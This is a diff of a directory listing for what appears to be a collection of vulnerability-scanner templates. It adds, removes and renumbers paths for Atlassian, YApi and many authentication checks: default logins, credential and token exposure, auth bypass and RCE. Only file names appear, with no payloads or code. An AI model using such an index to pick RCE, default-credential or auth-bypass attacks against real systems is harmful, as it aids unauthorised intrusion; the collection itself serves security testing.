@@ -1044,9 +1056,11 @@ ./poc/api/wso2-apimanager-detect-11639.yaml ./poc/api/wso2-apimanager-detect.yaml ./poc/api/yapi-detect-11719.yaml +./poc/api/yapi-detect-11720.yaml ./poc/api/yapi-detect-11721.yaml ./poc/api/yapi-detect-11722.yaml ./poc/api/yapi-rce-11724.yaml +./poc/api/yapi-rce-11725.yaml ./poc/api/yapi-rce-11726.yaml ./poc/api/yapi-rce.yml ./poc/api/yapi-sql-inject.yaml @@ -1062,7 +1076,7 @@ ./poc/atlassian/atlassian-bitbucket-loginbypass.yaml ./poc/atlassian/atlassian-crowd-panel-580.yaml ./poc/atlassian/atlassian-crowd-panel-582.yaml -./poc/atlassian/atlassian-crowd-panel-584.yaml +./poc/atlassian/atlassian-crowd-panel-583.yaml ./poc/atlassian/atlassian-crowd-panel-585.yaml ./poc/atlassian/atlassian-crowd-panel.yaml ./poc/atlassian/atlassian-jira-info-disclosure.yaml @@ -1095,7 +1109,7 @@ ./poc/atlassian/confluence-detect.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1190.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1191.yaml -./poc/atlassian/confluence-ssrf-sharelinks-1193.yaml +./poc/atlassian/confluence-ssrf-sharelinks-1192.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1194.yaml ./poc/atlassian/confluence-workflow-1195.yaml ./poc/atlassian/confluence-workflow.yaml @@ -1110,16 +1124,17 @@ ./poc/atlassian/jira-detect-2.yaml ./poc/atlassian/jira-detect-3.yaml ./poc/atlassian/jira-detect-8313.yaml +./poc/atlassian/jira-detect-8314.yaml ./poc/atlassian/jira-detect-8315.yaml ./poc/atlassian/jira-detect-8316.yaml ./poc/atlassian/jira-detect.yaml ./poc/atlassian/jira-exploitaiton-workflow.yaml ./poc/atlassian/jira-login-default.yaml ./poc/atlassian/jira-plugin-sqli.yaml +./poc/atlassian/jira-service-desk-signup-8317.yaml ./poc/atlassian/jira-service-desk-signup-8318.yaml ./poc/atlassian/jira-service-desk-signup-8319.yaml ./poc/atlassian/jira-service-desk-signup-8320.yaml -./poc/atlassian/jira-service-desk-signup-8321.yaml ./poc/atlassian/jira-service-desk-signup.yaml ./poc/atlassian/jira-setup.yaml ./poc/atlassian/jira-ssrf-cve-2019-8451.yml @@ -1132,20 +1147,19 @@ ./poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8329.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml -./poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml ./poc/atlassian/jira-unauthenticated-popular-filters.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8333.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml -./poc/atlassian/jira-unauthenticated-projects-8335.yaml ./poc/atlassian/jira-unauthenticated-projects-8336.yaml +./poc/atlassian/jira-unauthenticated-projects.yaml ./poc/atlassian/jira-unauthenticated-resolutions-8337.yaml +./poc/atlassian/jira-unauthenticated-screens-8338.yaml ./poc/atlassian/jira-unauthenticated-screens-8339.yaml -./poc/atlassian/jira-unauthenticated-screens.yaml ./poc/atlassian/jira-unauthenticated-user-picker-8340.yaml ./poc/atlassian/jira-unauthenticated-user-picker-8341.yaml +./poc/atlassian/jira-unauthenticated-user-picker.yaml ./poc/atlassian/jira-unauthenticated.yaml ./poc/atlassian/jira-workflow.yaml -./poc/atlassian/jira_user_piker.yaml ./poc/atlassian/jirausername.yaml ./poc/atlassian/poc-yaml-Confluence-ognl-rce.yaml ./poc/auth/1password-phish.yaml @@ -1270,14 +1284,15 @@ ./poc/auth/access-category-password.yaml ./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml ./poc/auth/accredible-certificates.yaml +./poc/auth/acemanager-login-23.yaml ./poc/auth/acemanager-login-24.yaml ./poc/auth/acemanager-login-25.yaml ./poc/auth/acemanager-login.yaml -./poc/auth/activemq-default-login-44.yaml ./poc/auth/activemq-default-login-45.yaml ./poc/auth/activemq-default-login-46.yaml ./poc/auth/activemq-default-login-47.yaml ./poc/auth/activemq-default-login-48.yaml +./poc/auth/activemq-default-login.yaml ./poc/auth/activemq-default-password.yaml ./poc/auth/activemq-default-password.yml ./poc/auth/acumbamail-signup-forms-800304421471470ce44a3c0fd0b43721.yaml @@ -1308,36 +1323,37 @@ ./poc/auth/adobe-aem-default-credentials-9.yaml ./poc/auth/adobe-component-login-1.yaml ./poc/auth/adobe-component-login-2.yaml -./poc/auth/adobe-component-login-90.yaml +./poc/auth/adobe-component-login-89.yaml ./poc/auth/adobe-component-login-92.yaml ./poc/auth/adobe-component-login.yaml ./poc/auth/adobe-connect-central-login-93.yaml ./poc/auth/adobe-connect-central-login-94.yaml -./poc/auth/adobe-connect-central-login-95.yaml ./poc/auth/adobe-connect-central-login-97.yaml ./poc/auth/adobe-connect-central-login.yaml -./poc/auth/adobe-experience-manager-login-106.yaml +./poc/auth/adobe-experience-manager-login-105.yaml ./poc/auth/adobe-experience-manager-login-107.yaml ./poc/auth/adobe-experience-manager-login-108.yaml ./poc/auth/adobe-experience-manager-login-109.yaml ./poc/auth/adobe-experience-manager-login.yaml ./poc/auth/adobe-secret.yaml +./poc/auth/aem-default-login-140.yaml ./poc/auth/aem-default-login-141.yaml ./poc/auth/aem-default-login-142.yaml ./poc/auth/aem-login-status-167.yaml ./poc/auth/aem-login-status-168.yaml ./poc/auth/aem-login-status-169.yaml -./poc/auth/aem-login-status-171.yaml +./poc/auth/aem-login-status-170.yaml +./poc/auth/aem-login-status.yaml ./poc/auth/aem-sling-login.yaml ./poc/auth/afterlogic-webmail-login.yaml ./poc/auth/age-identity-secret-key.yaml ./poc/auth/age-recipient-public-key.yaml ./poc/auth/aic-intelligent-campus-system-password-leak.yaml ./poc/auth/aic-intelligent-password-leak.yaml +./poc/auth/aims-password-mgmt-client-218.yaml +./poc/auth/aims-password-mgmt-client-219.yaml ./poc/auth/aims-password-mgmt-client-220.yaml -./poc/auth/aims-password-mgmt-client-221.yaml ./poc/auth/aims-password-mgmt-client.yaml -./poc/auth/aims-password-portal-222.yaml ./poc/auth/aims-password-portal-223.yaml ./poc/auth/aims-password-portal-224.yaml ./poc/auth/aims-password-portal.yaml @@ -1356,32 +1372,35 @@ ./poc/auth/alibaba-canal-default-password.yaml ./poc/auth/alibaba-canal-default-password.yml ./poc/auth/alibaba-key-id.yaml +./poc/auth/alibaba-mongoshake-unauth-268.yaml ./poc/auth/alibaba-mongoshake-unauth-269.yaml ./poc/auth/alibaba-mongoshake-unauth-270.yaml ./poc/auth/alibaba-nacos-v1-auth-bypass.yml ./poc/auth/alibaba-secret-id.yaml +./poc/auth/alphaweb-default-login-275.yaml ./poc/auth/alphaweb-default-login-276.yaml ./poc/auth/alphaweb-default-login-277.yaml ./poc/auth/amazon-accesskey-bypass.yaml -./poc/auth/amazon-mws-auth-token-11845.yaml ./poc/auth/amazon-mws-auth-token-281.yaml ./poc/auth/amazon-mws-auth-token-282.yaml ./poc/auth/amazon-mws-auth-token-283.yaml ./poc/auth/amazon-mws-auth-token-detect.yaml ./poc/auth/amazon-mws-auth-token-value.yaml +./poc/auth/amazon-mws-auth-token.yaml ./poc/auth/amazon-session-token.yaml ./poc/auth/amazon-sns-token.yaml ./poc/auth/ambari-default-credentials-286.yaml ./poc/auth/ambari-default-credentials.yaml +./poc/auth/ambari-default-login-287.yaml ./poc/auth/ambari-default-login-288.yaml ./poc/auth/ambari-default-login-289.yaml ./poc/auth/ambari-default-login-290.yaml ./poc/auth/ambari-default-password.yaml -./poc/auth/amcrest-login-297.yaml +./poc/auth/amcrest-login-296.yaml ./poc/auth/amcrest-login-298.yaml ./poc/auth/amcrest-login-299.yaml ./poc/auth/amcrest-login.yaml -./poc/auth/ametys-admin-login-300.yaml +./poc/auth/ametys-admin-login-301.yaml ./poc/auth/ametys-admin-login-302.yaml ./poc/auth/ametys-admin-login.yaml ./poc/auth/anaqua-login-panel.yaml @@ -1393,6 +1412,7 @@ ./poc/auth/apache-couchdb-unauth.yaml ./poc/auth/apache-druid-unauth.yaml ./poc/auth/apache-flink-unauth-rce-355.yaml +./poc/auth/apache-flink-unauth-rce-356.yaml ./poc/auth/apache-flink-unauth-rce-357.yaml ./poc/auth/apache-flink-unauth-rce-358.yaml ./poc/auth/apache-flink-unauth-rce-359.yaml @@ -1404,7 +1424,7 @@ ./poc/auth/apache-superset-login-extended.yaml ./poc/auth/apache-tomcat-snoop-cookie-handling.yaml ./poc/auth/apc-ups-login-381.yaml -./poc/auth/apc-ups-login-382.yaml +./poc/auth/apc-ups-login.yaml ./poc/auth/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml ./poc/auth/api-bearer-auth.yaml ./poc/auth/api-fortitoken-cloud.yaml @@ -1412,10 +1432,12 @@ ./poc/auth/api-key-for-google-maps.yaml ./poc/auth/api-keys.yaml ./poc/auth/api-mojoauth.yaml -./poc/auth/api-onelogin-472.yaml +./poc/auth/api-onelogin.yaml ./poc/auth/apisix-default-login-490.yaml +./poc/auth/apisix-default-login-491.yaml ./poc/auth/apisix-default-login-492.yaml ./poc/auth/apollo-default-login-520.yaml +./poc/auth/apple-app-site-association-524.yaml ./poc/auth/apple-app-site-association-525.yaml ./poc/auth/apple-app-site-association-526.yaml ./poc/auth/apple-app-site-association.yaml @@ -1424,7 +1446,6 @@ ./poc/auth/argocd-login-534.yaml ./poc/auth/argocd-login-535.yaml ./poc/auth/argocd-login-536.yaml -./poc/auth/argocd-login.yaml ./poc/auth/arl-default-login-537.yaml ./poc/auth/arl-default-login-538.yaml ./poc/auth/arl-default-login-540.yaml @@ -1489,8 +1510,8 @@ ./poc/auth/auto-login-new-user-after-registration.yaml ./poc/auth/auto-login-when-resister-2f930912217edb47a1b0335c7c11b347.yaml ./poc/auth/auto-login-when-resister.yaml +./poc/auth/avatier-password-management-604.yaml ./poc/auth/avatier-password-management-605.yaml -./poc/auth/avatier-password-management.yaml ./poc/auth/avatier_password_management.yaml ./poc/auth/avigilon-login.yaml ./poc/auth/avtech-password-disclosure.yaml @@ -1499,13 +1520,12 @@ ./poc/auth/aws-access-key-value-625.yaml ./poc/auth/aws-access-key-value.yaml ./poc/auth/aws-access-key.yaml -./poc/auth/aws-opensearch-login-650.yaml +./poc/auth/aws-opensearch-login-649.yaml ./poc/auth/aws-opensearch-login.yaml ./poc/auth/aws-secrets.yaml ./poc/auth/axiom-digitalocean-key-exposure-665.yaml -./poc/auth/axiom-digitalocean-key-exposure-666.yaml ./poc/auth/axiom-digitalocean-key-exposure-667.yaml -./poc/auth/axiom-digitalocean-key-exposure.yaml +./poc/auth/axiom-digitalocean-key-exposure-668.yaml ./poc/auth/axis2-default-login-1.yaml ./poc/auth/axis2-default-login-2.yaml ./poc/auth/axis2-default-login.yaml @@ -1518,8 +1538,8 @@ ./poc/auth/azkaban-default-login-671.yaml ./poc/auth/azkaban-default-login-672.yaml ./poc/auth/azkaban-default-login-673.yaml +./poc/auth/azkaban-default-login-674.yaml ./poc/auth/azkaban-default-login-675.yaml -./poc/auth/azkaban-default-login.yaml ./poc/auth/azkaban-default-password.yaml ./poc/auth/azkaban-web-client-default-creds.yaml ./poc/auth/azure-apim-secret-key-disclosure.yaml @@ -1533,9 +1553,9 @@ ./poc/auth/basic-auth-detection.yaml ./poc/auth/baw-login-logout-menu-321724627690a73c1b0fd584b423f0df.yaml ./poc/auth/baw-login-logout-menu.yaml -./poc/auth/bazarr-login-700.yaml ./poc/auth/bazarr-login-701.yaml ./poc/auth/bazarr-login-702.yaml +./poc/auth/bazarr-login-703.yaml ./poc/auth/bazarr-login.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-0c04f03046971ace3308f75f8502712f.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-4cedc7b2a0c00a81096cf3fcc283b780.yaml @@ -1560,10 +1580,11 @@ ./poc/auth/beescms_v4-login-sqli.yaml ./poc/auth/behavioral-auth-bypass.yaml ./poc/auth/beyondtrust-login-server-718.yaml +./poc/auth/beyondtrust-login-server-719.yaml ./poc/auth/beyondtrust-login-server.yaml ./poc/auth/bigant-login-panel.yaml ./poc/auth/bigbluebutton-login-724.yaml -./poc/auth/bigbluebutton-login-726.yaml +./poc/auth/bigbluebutton-login-725.yaml ./poc/auth/bigbluebutton-login.yaml ./poc/auth/bigfix-login.yaml ./poc/auth/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml @@ -1601,11 +1622,9 @@ ./poc/auth/bomgar-login-panel.yaml ./poc/auth/braintree-access-token-772.yaml ./poc/auth/braintree-access-token-773.yaml -./poc/auth/braintree-access-token.yaml -./poc/auth/branch-key-774.yaml +./poc/auth/branch-key-775.yaml ./poc/auth/branch-key.yaml ./poc/auth/brother-unauthorized-access-791.yaml -./poc/auth/brother-unauthorized-access-792.yaml ./poc/auth/brother-unauthorized-access-793.yaml ./poc/auth/brother-unauthorized-access.yaml ./poc/auth/brute-force-login-protection-20bc35cc9dd5149e33075d4261e715a7.yaml @@ -1613,10 +1632,9 @@ ./poc/auth/bsphp-nauthorized-access.yaml ./poc/auth/bt742-pma-unauthorized-access.yaml ./poc/auth/bt742-pma-unauthorized-access.yml +./poc/auth/businessintelligence-default-login-814.yaml ./poc/auth/businessintelligence-default-login-815.yaml ./poc/auth/businessintelligence-default-login-816.yaml -./poc/auth/businessintelligence-default-login-817.yaml -./poc/auth/businessintelligence-default-login.yaml ./poc/auth/camunda-login-panel-1.yaml ./poc/auth/camunda-login-panel-2.yaml ./poc/auth/camunda-login-panel.yaml @@ -1670,29 +1688,30 @@ ./poc/auth/chinaunicom-default-login-906.yaml ./poc/auth/chinaunicom-default-login-907.yaml ./poc/auth/chinaunicom-default-login-908.yaml +./poc/auth/chinaunicom-default-login-909.yaml ./poc/auth/chinaunicom-modem-default-credentials-911.yaml ./poc/auth/chinaunicom-modem-default-credentials.yaml ./poc/auth/chinaunicom-modem-default-password.yaml ./poc/auth/chinaunicom-modem-default-password.yml ./poc/auth/ciphertrust-default-password-vulnerability.yaml ./poc/auth/circarlife-default-login.yaml -./poc/auth/cisco-finesse-login-938.yaml ./poc/auth/cisco-finesse-login-939.yaml +./poc/auth/cisco-finesse-login-940.yaml ./poc/auth/cisco-finesse-login.yaml +./poc/auth/cisco-integrated-login-941.yaml ./poc/auth/cisco-integrated-login-942.yaml -./poc/auth/cisco-integrated-login-943.yaml ./poc/auth/cisco-integrated-login.yaml ./poc/auth/cisco-systems-login-974.yaml ./poc/auth/cisco-systems-login-975.yaml ./poc/auth/cisco-systems-login.yaml -./poc/auth/cisco-ucs-kvm-login-980.yaml +./poc/auth/cisco-ucs-kvm-login-979.yaml ./poc/auth/cisco-ucs-kvm-login.yaml ./poc/auth/cisco-vmanage-login.yaml ./poc/auth/citrix-cve-2020-8193-unauthorized.yml ./poc/auth/citrix-gateway-login.yaml ./poc/auth/citrix-netscaler-aaa-login.yml -./poc/auth/clave-login-panel-994.yaml ./poc/auth/clave-login-panel-995.yaml +./poc/auth/clave-login-panel-996.yaml ./poc/auth/clave-login-panel.yaml ./poc/auth/clean-login-06d6237e1f5cab68e8fb96b19ba95df6.yaml ./poc/auth/clean-login-3699fe4c48dfb5a3188e2bfc0ad1a878.yaml @@ -1707,6 +1726,7 @@ ./poc/auth/clickhouse-api-unauth.yaml ./poc/auth/clickhouse-db-unauth.yaml ./poc/auth/clickhouse-server-Unauthorized-Sql.yaml +./poc/auth/clickhouse-unauth-1002.yaml ./poc/auth/clickhouse-unauth-1003.yaml ./poc/auth/clickhouse-unauth-1004.yaml ./poc/auth/clickhouse-unauth-api.yaml @@ -1733,15 +1753,14 @@ ./poc/auth/cobbler-default-login-1118.yaml ./poc/auth/cobbler-default-login-1119.yaml ./poc/auth/cobbler-default-login-1120.yaml +./poc/auth/cobbler-default-login.yaml ./poc/auth/code-climate-token.yaml ./poc/auth/code-server-login.yaml ./poc/auth/codecov-access-token.yaml ./poc/auth/codepen-login-check.yaml -./poc/auth/codian-mcu-login-1139.yaml ./poc/auth/codian-mcu-login-1140.yaml ./poc/auth/coinbase-access-token.yaml ./poc/auth/coldfusion-administrator-login-1144.yaml -./poc/auth/coldfusion-administrator-login-1145.yaml ./poc/auth/coldfusion-administrator-login-1146.yaml ./poc/auth/coldfusion-administrator-login-1147.yaml ./poc/auth/coldfusion-administrator-login.yaml @@ -1814,8 +1833,8 @@ ./poc/auth/cookies-by-jm.yaml ./poc/auth/corero-cms-default-login.yaml ./poc/auth/corero-swa-default-login.yaml +./poc/auth/cortex-xsoar-login-1225.yaml ./poc/auth/cortex-xsoar-login-1226.yaml -./poc/auth/cortex-xsoar-login-1227.yaml ./poc/auth/cortex-xsoar-login-1228.yaml ./poc/auth/cortex-xsoar-login-1229.yaml ./poc/auth/cortex-xsoar-login.yaml @@ -1825,33 +1844,32 @@ ./poc/auth/creatio-login-panel.yaml ./poc/auth/credential-exposure-1249.yaml ./poc/auth/credential-exposure-1250.yaml -./poc/auth/credential-exposure-file.yaml ./poc/auth/credential-exposure.yaml ./poc/auth/credentials (copy 1).yaml -./poc/auth/credentials-1257.yaml +./poc/auth/credentials-1258.yaml ./poc/auth/credentials-1259.yaml -./poc/auth/credentials-disclosure-1252.yaml ./poc/auth/credentials-disclosure-1253.yaml ./poc/auth/credentials-disclosure-1254.yaml ./poc/auth/credentials-disclosure-1255.yaml ./poc/auth/credentials-disclosure-1256.yaml ./poc/auth/credentials-disclosure-all.yaml +./poc/auth/credentials-disclosure.yaml ./poc/auth/credentials-json.yaml ./poc/auth/credentials.yaml ./poc/auth/credit-tracker-2fde541f2278766f1674a8e26eb35024.yaml ./poc/auth/credit-tracker.yaml ./poc/auth/credova-financial-60afd6107fd9da419bced346f90a6333.yaml ./poc/auth/credova-financial.yaml -./poc/auth/crush-ftp-login-1273.yaml ./poc/auth/crush-ftp-login-1274.yaml +./poc/auth/crush-ftp-login-1275.yaml ./poc/auth/crush-ftp-login.yaml +./poc/auth/cs-cart-unauthenticated-lfi-1281.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1282.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1283.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1284.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1285.yaml -./poc/auth/cs-cart-unauthenticated-lfi.yaml ./poc/auth/cs141-default-login-1.yaml -./poc/auth/cs141-default-login-1277.yaml +./poc/auth/cs141-default-login-1278.yaml ./poc/auth/cs141-default-login-1279.yaml ./poc/auth/cs141-default-login-1280.yaml ./poc/auth/cs141-default-login-2.yaml @@ -1922,18 +1940,16 @@ ./poc/auth/dbeaver-credentials-6777.yaml ./poc/auth/dbeaver-credentials-6778.yaml ./poc/auth/dbeaver-credentials-6779.yaml +./poc/auth/dbeaver-credentials-6780.yaml ./poc/auth/dbeaver-credentials-6781.yaml -./poc/auth/dbeaver-credentials-6782.yaml ./poc/auth/dell-emc-ecom-default-credentials-6917.yaml ./poc/auth/dell-emc-ecom-default-credentials.yaml ./poc/auth/dell-idrac-default-login-6942.yaml ./poc/auth/dell-idrac-default-login-6943.yaml ./poc/auth/dell-idrac-default-login-6944.yaml ./poc/auth/dell-idrac-default-login-6945.yaml -./poc/auth/dell-idrac-default-login-6946.yaml ./poc/auth/dell-idrac9-default-login-6930.yaml ./poc/auth/dell-idrac9-default-login-6931.yaml -./poc/auth/dell-idrac9-default-login-6932.yaml ./poc/auth/dell-idrac9-default-login-6933.yaml ./poc/auth/dell-idrac9-default-login-6934.yaml ./poc/auth/dell-idrac9-default-login-6935.yaml @@ -1941,13 +1957,11 @@ ./poc/auth/dell-openmanager-login-1.yaml ./poc/auth/dell-openmanager-login-2.yaml ./poc/auth/dell-openmanager-login-6948.yaml -./poc/auth/dell-openmanager-login-6949.yaml ./poc/auth/dell-openmanager-login-6950.yaml ./poc/auth/dell-openmanager-login.yaml ./poc/auth/dell-remote-power-management-default-login.yaml ./poc/auth/dell-wyse-login-6952.yaml ./poc/auth/dell-wyse-login-6953.yaml -./poc/auth/dell-wyse-login-6954.yaml ./poc/auth/dell-wyse-login-6955.yaml ./poc/auth/dell-wyse-login.yaml ./poc/auth/dell-wyse-management-suite-login-6956.yaml @@ -1973,7 +1987,7 @@ ./poc/auth/discord-cilent-secret.yaml ./poc/auth/discuz-wechat-plugins-unauth.yaml ./poc/auth/discuz-wechat-plugins-unauth.yml -./poc/auth/django-secret.key.yaml +./poc/auth/django-secret-key.yaml ./poc/auth/dlink-850l-password-leak.yaml ./poc/auth/dlink-ac-centralized-management-system-default-login.yaml ./poc/auth/dlink-ac-default-password.yaml @@ -1994,7 +2008,6 @@ ./poc/auth/dologin-plugin.yaml ./poc/auth/dologin.yaml ./poc/auth/dolphinscheduler-default-login-7072.yaml -./poc/auth/dolphinscheduler-default-login-7073.yaml ./poc/auth/doppler-api-token.yaml ./poc/auth/dpt-oauth-client-c816cf65f82ebdf2ade35164058fc67e.yaml ./poc/auth/dpt-oauth-client-f37b20b98f49a19d8d00195f0b6db9ea.yaml @@ -2032,8 +2045,8 @@ ./poc/auth/drupal_module-super_login-cross-site-scripting.yaml ./poc/auth/drupal_module-token_custom-arbitrary-php-code-execution.yaml ./poc/auth/drupal_module-yubikey-access-bypass.yaml +./poc/auth/dubbo-admin-default-login-7120.yaml ./poc/auth/dubbo-admin-default-login-7121.yaml -./poc/auth/dubbo-admin-default-login.yaml ./poc/auth/dubbo-admin-default-password.yaml ./poc/auth/dubbo-admin-default-password.yml ./poc/auth/duffel-api-token.yaml @@ -2042,6 +2055,7 @@ ./poc/auth/dvwa-default-login-7128.yaml ./poc/auth/dvwa-default-login-7129.yaml ./poc/auth/dvwa-headless-automatic-login-7130.yaml +./poc/auth/dvwa-headless-automatic-login-7131.yaml ./poc/auth/dvwa-headless-automatic-login-7132.yaml ./poc/auth/dvwa-headless-automatic-login-7133.yaml ./poc/auth/dvwa-headless-automatic-login.yaml @@ -2119,8 +2133,8 @@ ./poc/auth/enterpriseloginmanagementsystem.yaml ./poc/auth/epmp-login-7228.yaml ./poc/auth/epmp-login-7229.yaml -./poc/auth/epmp-login-7230.yaml ./poc/auth/epmp-login-7231.yaml +./poc/auth/epmp-login.yaml ./poc/auth/epson-unauthorized-access-detect.yaml ./poc/auth/erident-custom-login-and-dashboard-0e2a68c6bc5c7e524706a5b5493bef90.yaml ./poc/auth/erident-custom-login-and-dashboard-65d615ac22cc89343ec17e71c91783a6.yaml @@ -2134,6 +2148,8 @@ ./poc/auth/esafenet-cdgserver3-linkfilterservice-bypassauth.yaml ./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/auth/esxi-unauthorized-access.yaml +./poc/auth/etcd-keys-7261.yaml +./poc/auth/etcd-keys-7262.yaml ./poc/auth/etcd-keys.yaml ./poc/auth/etcd-unauth.yaml ./poc/auth/etcd-unauth.yml @@ -2159,6 +2175,7 @@ ./poc/auth/exacqvision-default-login-7274.yaml ./poc/auth/exacqvision-default-login-7275.yaml ./poc/auth/exacqvision-default-login-7276.yaml +./poc/auth/exacqvision-default-login-7277.yaml ./poc/auth/exacqvision-default-password.yaml ./poc/auth/exchange-addon-authorize-net-d43cc9eb0f6efba271859825f9179410.yaml ./poc/auth/exchange-addon-authorize-net.yaml @@ -2166,14 +2183,14 @@ ./poc/auth/exposed-authentication-asmx-7287.yaml ./poc/auth/exposed-authentication-asmx-7288.yaml ./poc/auth/exposed-authentication-asmx-7289.yaml +./poc/auth/exposed-authentication-asmx.yaml ./poc/auth/exposed-authentication.asmx.yaml ./poc/auth/extra-secrets.yaml ./poc/auth/extractor-creditcard.yaml ./poc/auth/f5-bigip-unauthorized-access.yaml ./poc/auth/facebook-api-token.yaml -./poc/auth/facebook-secret-7386.yaml +./poc/auth/facebook-secret-11849.yaml ./poc/auth/facebook-secret.yaml -./poc/auth/facebook-secrets.yaml ./poc/auth/fake-auth-bypass.yaml ./poc/auth/fake-auth-header-auth-bypass.yaml ./poc/auth/fake-referer-header-auth-bypass.yaml @@ -2185,6 +2202,7 @@ ./poc/auth/fanwei-unauth.yaml ./poc/auth/faraday-login-7393.yaml ./poc/auth/faraday-login-7394.yaml +./poc/auth/faraday-login-7395.yaml ./poc/auth/faraday-login-7396.yaml ./poc/auth/faraday-login.yaml ./poc/auth/fastly-api-token.yaml @@ -2194,8 +2212,8 @@ ./poc/auth/fcm-api-key.yaml ./poc/auth/fcm-server-key-7450.yaml ./poc/auth/fcm-server-key-7451.yaml -./poc/auth/fcm-server-key-7452.yaml ./poc/auth/fcm-server-key-7453.yaml +./poc/auth/fcm-server-key-7454.yaml ./poc/auth/fcm-server-key.yaml ./poc/auth/feather-login-page-0bc47f0828578a01035f4ac0c01bf787.yaml ./poc/auth/feather-login-page-291153fe25b5ab0269ede43db1b50194.yaml @@ -2215,8 +2233,8 @@ ./poc/auth/finnhub-access-token.yaml ./poc/auth/finnhub-accesstoken.yaml ./poc/auth/firebase-api-key.yaml +./poc/auth/fireware-xtm-user-authentication-7501.yaml ./poc/auth/fireware-xtm-user-authentication-7502.yaml -./poc/auth/fireware-xtm-user-authentication-7503.yaml ./poc/auth/fireware-xtm-user-authentication.yaml ./poc/auth/flahscookie-superadmin-panel.yaml ./poc/auth/flir-ax8-default-credentials-7512.yaml @@ -2225,6 +2243,7 @@ ./poc/auth/flir-default-login-7514.yaml ./poc/auth/flir-default-login-7515.yaml ./poc/auth/flir-default-login-7516.yaml +./poc/auth/flir-default-login.yaml ./poc/auth/fortiauthenticator-detect.yaml ./poc/auth/fortitester-login-panel.yaml ./poc/auth/freakauth.yaml @@ -2234,18 +2253,16 @@ ./poc/auth/frp-default-login-7556.yaml ./poc/auth/frp-default-login-7557.yaml ./poc/auth/frp-default-login-7558.yaml -./poc/auth/frp-default-login.yaml +./poc/auth/frp-default-login-7559.yaml ./poc/auth/frp-unauthenticated.yaml ./poc/auth/ftp-anonymous-login.yaml ./poc/auth/ftp-credentials-exposure-7567.yaml -./poc/auth/ftp-credentials-exposure-7568.yaml +./poc/auth/ftp-credentials-exposure.yaml ./poc/auth/ftp-default-credentials.yaml -./poc/auth/ftp-default-creds.yaml ./poc/auth/ftp-weak-credentials-7569.yaml ./poc/auth/ftp-weak-credentials-7570.yaml ./poc/auth/ftp-weak-credentials.yaml -./poc/auth/fuelcms-default-login-7572.yaml -./poc/auth/fuelcms-default-login.yaml +./poc/auth/fuelcms-default-login-7571.yaml ./poc/auth/fusionauth-admin-panel.yaml ./poc/auth/fusionauth-admin-setup.yaml ./poc/auth/fuzz-oauth.yaml @@ -2267,14 +2284,15 @@ ./poc/auth/general-tokens-7581.yaml ./poc/auth/general-tokens-7582.yaml ./poc/auth/general-tokens-7583.yaml -./poc/auth/general-tokens-7584.yaml ./poc/auth/general-tokens-7585.yaml ./poc/auth/general-tokens-7586.yaml ./poc/auth/general-tokens.yaml ./poc/auth/geoserver-default-login-7593.yaml +./poc/auth/geoserver-default-login-7594.yaml +./poc/auth/geoserver-default-login.yaml ./poc/auth/geoserver-login-panel.yaml ./poc/auth/get-access-token-json.yaml -./poc/auth/git-credentials-7643.yaml +./poc/auth/git-credentials-7644.yaml ./poc/auth/git-credentials-disclosure-7639.yaml ./poc/auth/git-credentials-disclosure-7640.yaml ./poc/auth/git-credentials-disclosure-7642.yaml @@ -2293,6 +2311,7 @@ ./poc/auth/gitlab-login-panel.yaml ./poc/auth/gitlab-personal-accesstoken.yaml ./poc/auth/gitlab-pipeline-triggertoken.yaml +./poc/auth/gitlab-public-signup-7681.yaml ./poc/auth/gitlab-public-signup-7682.yaml ./poc/auth/gitlab-public-signup-7683.yaml ./poc/auth/gitlab-public-signup-7684.yaml @@ -2305,6 +2324,7 @@ ./poc/auth/gitlab-weak-login-3.yaml ./poc/auth/gitlab-weak-login-4.yaml ./poc/auth/gitlab-weak-login-7704.yaml +./poc/auth/gitlab-weak-login-7705.yaml ./poc/auth/gitlab-weak-login-7706.yaml ./poc/auth/gitlab-weak-login-7707.yaml ./poc/auth/gitter-token.yaml @@ -2312,9 +2332,9 @@ ./poc/auth/gloo-unauth-7724.yaml ./poc/auth/gloo-unauth-7725.yaml ./poc/auth/gloo-unauth.yaml -./poc/auth/glpi-authentication-7727.yaml ./poc/auth/glpi-authentication-7728.yaml ./poc/auth/glpi-authentication-7729.yaml +./poc/auth/glpi-authentication-7730.yaml ./poc/auth/glpi-authentication.yaml ./poc/auth/glpi-default-credential.yaml ./poc/auth/glpi-default-login-7731.yaml @@ -2323,8 +2343,8 @@ ./poc/auth/glpi-default-login.yaml ./poc/auth/glpi-login-1.yaml ./poc/auth/glpi-login-2.yaml -./poc/auth/glpi-login-7735.yaml ./poc/auth/glpi-login-7736.yaml +./poc/auth/glpi-login-7737.yaml ./poc/auth/glpi-login.yaml ./poc/auth/gmail-api-client-secrets-7740.yaml ./poc/auth/gmail-api-client-secrets.yaml @@ -2356,11 +2376,12 @@ ./poc/auth/google-authenticator.yaml ./poc/auth/google-earth-dlogin-7778.yaml ./poc/auth/google-earth-dlogin-7779.yaml +./poc/auth/google-earth-dlogin-7780.yaml ./poc/auth/google-earth-dlogin-7781.yaml ./poc/auth/google-earth-dlogin-7782.yaml -./poc/auth/google-earth-dlogin.yaml ./poc/auth/google-earthenterprise-weak-password.yaml ./poc/auth/google-oauth-clientsecret.yaml +./poc/auth/google-secrets.yaml ./poc/auth/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/auth/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml ./poc/auth/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ 